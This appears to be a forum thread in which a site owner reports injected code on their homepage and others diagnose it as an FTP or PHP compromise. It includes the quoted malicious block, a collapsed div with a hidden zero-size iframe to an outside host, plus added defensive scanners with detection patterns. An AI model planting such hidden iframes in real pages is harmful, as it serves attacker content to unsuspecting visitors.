How did this code get onto my site?

I noticed a slight glitch on the index page of my website yesterday;

I'd not spotted it before so I checked the source code and this is what I found :eek: How on earth did it get on there? I checked the copy stored on my computer and it's perfectly clean! The glitch is gone when I move that code.

<div style="overflow:auto; height: 1px; ">

<div>
<h1>


</h1>
<div>
<div style="overflow:auto; height: 1px; ">

<div>
<h1>

</h1>
<div>
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>

</body>
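An added example, not part of the original post: a scanner that flags the two patterns visible in the injected block above, external links nested inside a container collapsed with inline CSS, and a zero-size iframe pointing off-site. The host names in the sample are constructed placeholders, and `own_host` is an assumed parameter naming the site's own domain.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that collapse or hide an element (the post's case: height: 1px).
CONCEAL = re.compile(r"(?:^|;)\s*(?:height|width)\s*:\s*[01](?:px)?\s*(?:;|$)"
                     r"|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class InjectionScanner(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host
        self.stack = []      # (tag, concealed) for every element still open
        self.findings = []   # (line, kind, url)
    def _external(self, url):
        host = urlparse(url or "").hostname
        return host is not None and host != self.own_host
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        concealed = bool(CONCEAL.search(a.get("style") or ""))
        inside = any(c for _, c in self.stack)
        if tag == "iframe":
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if (tiny or concealed) and self._external(a.get("src")):
                self.findings.append((self.getpos()[0], "hidden-iframe", a["src"]))
        elif tag == "a" and inside and self._external(a.get("href")):
            self.findings.append((self.getpos()[0], "hidden-link", a["href"]))
        if tag not in ("br", "hr", "img", "input", "link", "meta"):
            self.stack.append((tag, concealed))
    def handle_endtag(self, tag):
        # Injected markup is often unbalanced, so unwind to the matching opener.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

def scan(html, own_host):
    scanner = InjectionScanner(own_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample shaped like the injected block; hosts are placeholders.
SAMPLE = """<p><a href="http://partner.example/">Visible link</a></p>
<div style="overflow:auto; height: 1px; "><div><h1>
<a href="http://pills.example/a.html">Hidden anchor</a>
</h1><div>
<iframe src="http://redirect.example/out.php?s_id=1" width=0 height=0></iframe>
</body>"""
```

Running `scan()` over every page on the server and over the clean local copy, then comparing the findings, shows which files were altered.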
 
I'd change your ftp/cpanel password if I were you. But it could also be some kind of server side attack that probably affected lots of customers.
 
I've told UH Hosting about it and I'm waiting to see what they have to say :) I'm just glad all those links weren't visible on the site as I'm sure it would have put off potential customers!
 
This could be one of 3 things.

- Someone knows or has guessed your FTP password
- You have a PHP script which is vulnerable to an XSS attack. The attackers have managed to convince your script to write to your files
- Your hosting provider's server has been rooted

HTH :)
 
You have been hacked. What they have tried to do is make it so the links don't show but they get back logs on Google etc. for better rank, which means better income etc. I would go and change your cpanel/account password to something harder to crack. And if you're using PHP and you coded it, you might also have a nice lil hole in your coding. When I learnt PHP a while back, people who knew what they were doing could upload files to my server through the PHP page.

Good luck with it.
 
Thanks for the advice all. I did code the php script myself, so chances are that's the problem :p The glitch has appeared a couple of times now, but it was only this time I noticed what was causing it. I'll change my password first and see if it happens again.
 
It's UH Hosting. They're crap. Some web space I have with them got infected with this crap too and my password isn't in the dictionary and would take several years to brute.
 
Haha UH. I remember the guy who runs it used to post on another forum about 5 years ago.. I would switch hosting and save yourself valuable time.
 
Simmy said:
Thanks for the advice all. I did code the php script myself, so chances are that's the problem :p The glitch has appeared a couple of times now, but it was only this time I noticed what was causing it. I'll change my password first and see if it happens again.

It's the **** hosting company. I have just checked my website and it has also been attacked with an iframe for the 3rd time. I am really getting annoyed at this now. I emailed them last time it happened to ask them why it is happening and why they hadn't alerted me since there were posts all over their forums about it. They fobbed me off telling me they have checked all their security and it is fine so they have deduced that it is not their problem.

http://forums.uh-hosting.co.uk/showthread.php?t=2876

When my contract period ends I am outta there.
 
Well I've just switched to Streamline, who are saving me £60 per year compared to UH Hosting! And they offer unlimited bandwidth/webspace. The account was set up instantly as well, so I'm very impressed thus far :)
 
You should switch to IIS 6. It will sandbox the PHP processes.

Out-of-the-box... IIS security > Apache security.
 
Sandboxing would have prevented the exploited PHP process from affecting other accounts on the same server.
 
Sandboxing PHP shouldn't be necessary if the rest of your system is secure...

Unless the files which were modified were owned by the same user PHP on the compromised site was running under or had global write permissions, there is clearly something more serious going on than a PHP bug.

I'm not saying we're perfect. We had a server compromised (the first in 3.5 years and 100+ servers) a few months ago and we learnt a lot from it. No matter how secure you think a system is, there's always a way in...
 
All I know is this:

The code is added to an account via FTP. It’s all automated, a machine connects, downloads an index file then within 4 secs it is re-uploaded with the suspect line added.

What I don’t know and what worries me to death, is how they gained entry to FTP in the first place with a specific user + pass.

There was also a ProFTPd exploit (we were up to date at the time and the hole that could allow the exploit wasn’t patched until recently) that *may* have allowed an exploit to take place. So all machines are now running Pure-FTPd.

Our servers run PHP as CGI, all but one are using PHPSUEXEC. Interestingly the problem hasn’t occurred on one of our servers that runs suPHP (PHPSUEXEC alternative) – All this means PHP runs as the real user and not the Apache user “nobody”. Making it easier to identify problem sites, limit resource usage etc.
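An added example, not part of the post above and not the host's own tooling: a log check for the pattern it describes, where one client downloads a file and re-uploads it seconds later. It assumes the FTP server writes the standard xferlog transfer log format; the log lines, addresses, user names and the 10-second window are constructed for illustration.

```python
from datetime import datetime, timedelta

def parse_xferlog(line):
    """Split one xferlog record into the fields this check needs."""
    f = line.split()
    if len(f) < 18:
        return None
    return {
        "time": datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y"),
        "host": f[6], "size": int(f[7]), "path": f[8],
        "direction": f[11],           # o = download (RETR), i = upload (STOR)
        "user": f[13], "complete": f[17] == "c",
    }

def fetch_then_overwrite(lines, window=timedelta(seconds=10)):
    """Return uploads replacing a file the same client downloaded moments before."""
    last_download = {}   # (host, user, path) -> download record
    hits = []
    for rec in filter(None, map(parse_xferlog, lines)):
        if not rec["complete"]:
            continue
        key = (rec["host"], rec["user"], rec["path"])
        if rec["direction"] == "o":
            last_download[key] = rec
        elif rec["direction"] == "i" and key in last_download:
            down = last_download.pop(key)
            gap = rec["time"] - down["time"]
            if timedelta(0) <= gap <= window:
                hits.append({"user": rec["user"], "host": rec["host"],
                             "path": rec["path"],
                             "gap_seconds": int(gap.total_seconds()),
                             "grew_by": rec["size"] - down["size"]})
    return hits

# Constructed records: an automated 4-second round trip, then a human edit 35 min apart.
LOG = [
    "Thu Nov  8 03:14:07 2007 1 203.0.113.7 5120 /home/alice/public_html/index.html a _ o r alice ftp 0 * c",
    "Thu Nov  8 03:14:11 2007 1 203.0.113.7 5212 /home/alice/public_html/index.html a _ i r alice ftp 0 * c",
    "Thu Nov  8 09:30:00 2007 2 198.51.100.20 8000 /home/bob/public_html/index.html a _ o r bob ftp 0 * c",
    "Thu Nov  8 10:05:42 2007 2 198.51.100.20 8100 /home/bob/public_html/index.html a _ i r bob ftp 0 * c",
]
```

A hit with a small positive `grew_by` on an index file matches an appended line; the account's FTP password should be treated as known to the client in `host`.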
 
Aye, it is very odd and rather worrying. It's possible for PHP to be rooted (happened with v4.4.3-related - was an exploit script in the wild for that), or it's possible someone rooted the server entirely separately and has managed to crack the passwords. I would scramble user passwords - though that's a complete pain for users....we can't win :(

/Goes back to cPanel forums, though I wonder if OcUK > cPanel :D
 